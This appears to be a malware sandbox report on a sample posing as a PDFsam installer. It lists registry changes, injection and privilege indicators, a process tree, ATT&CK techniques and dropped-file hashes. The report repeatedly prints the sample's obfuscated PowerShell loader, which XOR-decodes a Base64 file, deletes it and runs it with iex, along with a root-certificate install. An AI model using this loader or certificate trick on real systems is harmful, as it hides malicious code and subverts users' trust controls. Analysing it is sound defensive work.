302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	CMmnnjAi1984unbd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	CMmnnjAi1984unbd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	CMmnnjAi1984unbd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	CMmnnjAi1984unbd.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2748	powershell.exe
2976	powershell.exe
2612	powershell.exe
2724	powershell.exe
1240	powershell.exe
944	powershell.exe
2688	powershell.exe
2328	powershell.exe
396	powershell.exe
2884	powershell.exe
2928	powershell.exe
2804	CMmnnjAi1984unbd.exe
2804	CMmnnjAi1984unbd.exe
2804	CMmnnjAi1984unbd.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2804	CMmnnjAi1984unbd.exe
2804	CMmnnjAi1984unbd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 2804	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	30
PID 2352 wrote to memory of 2804	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	30
PID 2352 wrote to memory of 2804	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	30
PID 2352 wrote to memory of 2804	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	30
PID 2352 wrote to memory of 2804	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	30
PID 2352 wrote to memory of 2804	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	30
PID 2352 wrote to memory of 2804	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	30
PID 2352 wrote to memory of 2928	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	31
PID 2352 wrote to memory of 2928	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	31
PID 2352 wrote to memory of 2928	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	31
PID 2352 wrote to memory of 2928	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	31
PID 2352 wrote to memory of 2328	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	33
PID 2352 wrote to memory of 2328	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	33
PID 2352 wrote to memory of 2328	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	33
PID 2352 wrote to memory of 2328	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	33
PID 2352 wrote to memory of 2976	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	35
PID 2352 wrote to memory of 2976	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	35
PID 2352 wrote to memory of 2976	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	35
PID 2352 wrote to memory of 2976	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	35
PID 2352 wrote to memory of 2884	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	37
PID 2352 wrote to memory of 2884	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	37
PID 2352 wrote to memory of 2884	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	37
PID 2352 wrote to memory of 2884	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	37
PID 2352 wrote to memory of 2724	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	38
PID 2352 wrote to memory of 2724	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	38
PID 2352 wrote to memory of 2724	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	38
PID 2352 wrote to memory of 2724	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	38
PID 2352 wrote to memory of 2688	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	41
PID 2352 wrote to memory of 2688	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	41
PID 2352 wrote to memory of 2688	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	41
PID 2352 wrote to memory of 2688	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	41
PID 2352 wrote to memory of 2748	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	43
PID 2352 wrote to memory of 2748	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	43
PID 2352 wrote to memory of 2748	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	43
PID 2352 wrote to memory of 2748	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	43
PID 2352 wrote to memory of 944	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	45
PID 2352 wrote to memory of 944	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	45
PID 2352 wrote to memory of 944	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	45
PID 2352 wrote to memory of 944	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	45
PID 2352 wrote to memory of 1240	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	47
PID 2352 wrote to memory of 1240	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	47
PID 2352 wrote to memory of 1240	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	47
PID 2352 wrote to memory of 1240	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	47
PID 2352 wrote to memory of 396	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	49
PID 2352 wrote to memory of 396	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	49
PID 2352 wrote to memory of 396	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	49
PID 2352 wrote to memory of 396	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	49
PID 2352 wrote to memory of 2612	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	50
PID 2352 wrote to memory of 2612	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	50
PID 2352 wrote to memory of 2612	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	50
PID 2352 wrote to memory of 2612	2352	032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe	50
PID 2804 wrote to memory of 2940	2804	CMmnnjAi1984unbd.exe	53
PID 2804 wrote to memory of 2940	2804	CMmnnjAi1984unbd.exe	53
PID 2804 wrote to memory of 2940	2804	CMmnnjAi1984unbd.exe	53
PID 2804 wrote to memory of 2940	2804	CMmnnjAi1984unbd.exe	53
PID 2804 wrote to memory of 2940	2804	CMmnnjAi1984unbd.exe	53
PID 2804 wrote to memory of 2940	2804	CMmnnjAi1984unbd.exe	53
PID 2804 wrote to memory of 2940	2804	CMmnnjAi1984unbd.exe	53
PID 2804 wrote to memory of 2968	2804	CMmnnjAi1984unbd.exe	54
PID 2804 wrote to memory of 2968	2804	CMmnnjAi1984unbd.exe	54
PID 2804 wrote to memory of 2968	2804	CMmnnjAi1984unbd.exe	54
PID 2804 wrote to memory of 2968	2804	CMmnnjAi1984unbd.exe	54
PID 2804 wrote to memory of 2968	2804	CMmnnjAi1984unbd.exe	54
PID 2804 wrote to memory of 2968	2804	CMmnnjAi1984unbd.exe	54

C:\Users\Admin\AppData\Local\Temp\032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe
"C:\Users\Admin\AppData\Local\Temp\032b09bbf1c63afc06afb011d69bafc096d7d925d99e24e3785db5a2957358ec.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Users\Admin\AppData\Local\Temp\CMmnnjAi1984unbd.exe
  "C:\Users\Admin\AppData\Local\Temp\CMmnnjAi1984unbd.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32.exe /s "C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:2940
- - C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe
    "C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe" /RegServer
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:2968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2328
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Drops startup file
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2976
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Drops startup file
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2884
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Drops startup file
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2748
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Drops startup file
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:944
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Drops startup file
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1240
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:396
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$xp='C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl';$xk='DeCchVMEdAPfyXoanSjrqvGFOYikupgJxbstUmHKNQILlWZTBRzw';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
  2⤵
  - Drops startup file
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2612

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{77EC23C5-BB68-4A7B-AE5C-F4AD0B6C678D}
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll

Filesize
2.7MB

MD5
417f5c1e34d2abc002301ba08c546b6d

SHA1
834a9410da82fecbcb00e641fb403919ec11f3b9

SHA256
2aee68c1d66e0bd7741dbe002719c71017094fe3bb506f75aaa859815a089329

SHA512
cb2f38d22025cfb4f276691e1e10eae47b659b6375f8cba7366ba6a7ec2384b5886764913ca69e274ec000133276b8fbddc33a8567dd576f3e498429b69ce605

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE7A3.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\FkJB11kdJJhbdDl

Filesize
164KB

MD5
1883c758f90fc3bfbd814ebc91788131

SHA1
66bba1444572c69dc42fd3f62c85dbc95f237f01

SHA256
5d21a5d9b66ea0d427fc8d533da1e1a5508bbcd69778403d12cf9f6e4c293d0e

SHA512
9372861ef362e4667acaa5f8d9e24bd39300831d329a8d903ee644901b613238e79769a62d0af7a937fbb0efda00f223061c70b862961221b46083a8f70bdad9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEE69.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK

Filesize
1KB

MD5
7317751eb990f926f01b0823388fc51b

SHA1
ea00c15aa12cfa9733819f015bba662ad22fb81d

SHA256
c0dd00752e1b3e5f9e8e3e8eac7f2a29af6e195d8997ce52b6a36c1febe9aedd

SHA512
5ac0b01cafa3c5367645a0cc20a808ec42312b2e0927e1f2962ceb6e806a7f03c4f13f3961acf8ee956c72bde5f7c314384847a52dc165f8ca2d30e6a716f562

Download Submit
C:\Users\Admin\AppData\Roaming\MIcROsoFt\wInDowS\sTARt MenU\PRograMS\staRtUP\a81132a821948785c704c56b34d98.lNK

Filesize
1019B

MD5
2f1f6711230a604098767d442ed6419f

SHA1
4e1ecb39a615c9b48b6961323f16c440cf4b0453

SHA256
cd6181c9a57423c08a732e4507ac0a1fb668f43f0753dd10eb585cff4e533af8

SHA512
1c7a5d8d53b0c1f9376ba213860fbdd2643ba3c95eecc7f5d54342df6372c6177223f933af25d4d4e5898bb7f99051f128b414b2049fa8758f2d107a33354409

Download Submit
